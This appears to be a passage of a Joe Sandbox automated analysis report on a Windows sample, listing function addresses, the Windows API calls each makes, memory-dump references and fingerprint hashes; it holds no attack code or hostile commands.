Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9

Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
malloc.MSVCRT ref: 00412921
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
malloc.MSVCRT ref: 00412950

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8

Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,00989768,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
wcslen.MSVCRT ref: 0040B01A
CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8

Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D

Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CurrentHandleProcess$CloseDuplicate
String ID:
API String ID: 1410216518-0
Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64

Function 00402FAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(00980000,00000000,?,?), ref: 0040E5BC

Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB

Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
Part of subcall function 00409355: memset.MSVCRT ref: 00409381
Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00987F80,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD

Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0

Strings

$pA, xrefs: 00403078

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
String ID: $pA
API String ID: 790731606-4007739358
Opcode ID: 02d24acb7b8711565022e352de9b6058ba283387d51b5c6ca33e1a4a7ccffd60
Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
Opcode Fuzzy Hash: 02d24acb7b8711565022e352de9b6058ba283387d51b5c6ca33e1a4a7ccffd60
Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E

Function 0040249D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
PathRemoveArgsW.SHLWAPI(?), ref: 00402585

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(00980000,00000000,?), ref: 0040E599

Part of subcall function 004099A5: SetEnvironmentVariableW.KERNELBASE(00989768,00989768,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(00980000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Strings

*pA, xrefs: 004025AB

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: *pA
API String ID: 1199808876-3833533140
Opcode ID: ff22d50e32c7b344f81147fcd13b47847f2418c60676d86c95cb8761d58184ec
Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
Opcode Fuzzy Hash: ff22d50e32c7b344f81147fcd13b47847f2418c60676d86c95cb8761d58184ec
Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E

Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754

Strings

, xrefs: 0040976E
", xrefs: 00409776

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369

Function 0040A638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040A66D
wcscmp.MSVCRT ref: 0040A6A6

Strings

$0A, xrefs: 0040A644

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: _wcsicmpwcscmp
String ID: $0A
API String ID: 3419221977-513306843
Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA

Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746

Strings

$0A, xrefs: 0040570B

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: $0A
API String ID: 626452242-513306843
Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD

Function 0040DBFF Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94

Function 0040E7D0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040E7E5
HeapAlloc.KERNEL32(00980000,00000000,0000000A), ref: 0040E809
HeapReAlloc.KERNEL32(00980000,00000000,00000000,0000000A), ref: 0040E82D
HeapFree.KERNEL32(00980000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98

Function 0040DB18 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65

Function 0040DD5D Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8

Function 0040A54F Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802

Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

Memory Dump Source

Source File: 00000000.00000002.4606063014.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4606021737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606107211.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606147052.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4606183078.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_nkYzjyrKYK.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
